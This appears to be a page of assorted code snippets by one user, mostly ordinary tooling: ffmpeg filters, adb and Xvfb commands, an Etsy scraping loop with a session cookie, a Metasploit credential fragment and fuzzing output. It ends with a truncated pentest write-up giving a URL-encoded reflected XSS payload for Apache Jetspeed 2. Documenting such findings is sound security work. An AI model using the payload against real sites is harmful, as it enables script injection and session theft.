brandonprry

-vf zscale=t=linear:npl=100,format=gbrpf32le,tonemap=tonemap=gamma:param=1.2:desat=0:peak=15,zscale=p=709:t=709:m=709:r=full:d=error_diffusion,noise=alls=3:allf=t+u,eq=saturation=0.9:brightness=0.15:contrast=1.15:gamma=0.85,huesaturation=colors='y':saturation=-0.5:intensity=0.25,"curves=all='0.05/0 0.35/0.5 1/1'","curves=all='0/0 0.75/0.76 0.9/0.94 1/1'",deband=1thr=0.015:2thr=0.015:3thr=0.015:4thr=0.015:range=16:blur=true:coupling=true,noise=alls=2:allf=p+t,colorspace=iall=bt709:all=bt709:range=tv:format=yuv420p:dither=fsb

brandonprry

#export https_proxy=http://127.0.0.1:8081

USER=''
PASS=''
KEY="bd516a32ff7db81c4a991acfc5656da3" #not secret
TALENT="967951"
VERSION="48"


rm /tmp/fdsa

brandonprry

COOKIE='your_web_session_cookie_use_document.cookie_in_js_console'
SHOP='your_shop_id'

for i in `seq 0 39 500`; do curl --retry 5 \
    -H $'Host: www.etsy.com' -H $'Authority: www.etsy.com' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.9' -H $'Content-Type: application/json' -H $'Referer: https://www.etsy.com/your/shops/WanderingRobotStudio/tools/listings/view:table/1492031241' -H $'Sec-Ch-Ua: \"Google Chrome\";v=\"113\", \"Chromium\";v=\"113\", \"Not-A.Brand\";v=\"24\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"macOS\"' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36' -H $'X-Detected-Locale: USD|en-US|US' -H $'X-Requested-With: XMLHttpRequest' \
    -b "$COOKIE" \
    $'https://www.etsy.com/api/v3/ajax/shop/'$SHOP'/listings/search?limit=200&offset='$i'&sort_field=ending_da

brandonprry

Turn on debugging.

Still install sshd. File transfer over adb push/pull is too slow.

#Disable Sound
$ adb shell input keyevent 164

$ adb shell svc power stayon true

$ adb tcpip 4321 #Enable adb over wifi.

brandonprry

repeat 
    tell application "System Events" to key code (random number from 0 to 44)
    delay 8
end repeat

brandonprry

     cred_collection = ::Metasploit::Framework::CredentialCollection.new(
       user_file: datastore['USER_FILE'],
       username: datastore['USERNAME'],
       blank_passwords: true
     )

brandonprry

apt-get install xvfb && Xvfb :1 -screen 0 640x480x8 && export DISPLAY=:1.0 ; xcalc

brandonprry

bperry@ubuntu:~/tmp$ DYNINSTAPI_RT_LIB=./dyninst-9.2.0/build/dyninstAPI_RT/libdyninstAPI_RT.so LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH ./afl-dyninst -i fisimple -o fi_inst  -l libsc_fi.so -d
Skipping library: libAflDyninst.so
Skipping library: crtstuff.c
Skipping library: libAflDyninst.cpp
Instrumenting module: fisimple
Instrumenting module: crtstuff.c
Skipping library: DEFAULT_MODULE
Instrumenting module: libsc_fi.so
Segmentation fault
bperry@ubuntu:~/tmp$ 

brandonprry

    for( j = 0; j < n->classname_len && j<9; j++)
      kv[j] = b[j*2];

    kv[8] = 0;
    sscanf( kv, "%x", (unsigned int*)( &key[i*4] ) );

brandonprry

During a recent pentest, we came across the Apache Jetspeed 2 HTTP server. After a few hours of testing, I realised that the web application was vulnerable to an unauthenticated reflected XSS attack. However, I was limited, as I could not use < or > in the URL, as Jetspeed would return a 400 Bad Request HTTP response.

I could break out of an attribute that was storing the URL with a double-quote ("), though, so I could control the attributes on a random element. A specially crafted URL could define a style attribute making the arbitrary HTML element take up the entire page, then an onmouseover attribute could execute random javascript. I ended up with a generic URL that looked like this (URL encoded):

---

http://192.168.0.7:8080/jetspeed/portal/fdsa%22%20%73%74%79%6c%65%3d%22%70%61%64%64%69%6e%67%2d%74%6f%70%3a%35%30%30%30%70%78%3b%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%70%6f%73%69%74%69%6f%6e%3a%66%69%78%65%64%3b%74%6f%70%3a%30%3b%6c%65%66%74%3a%30%3b%22%20%6f%6e%6d%6f%75%73%65%6f%76%65%72%3d%22%6a%61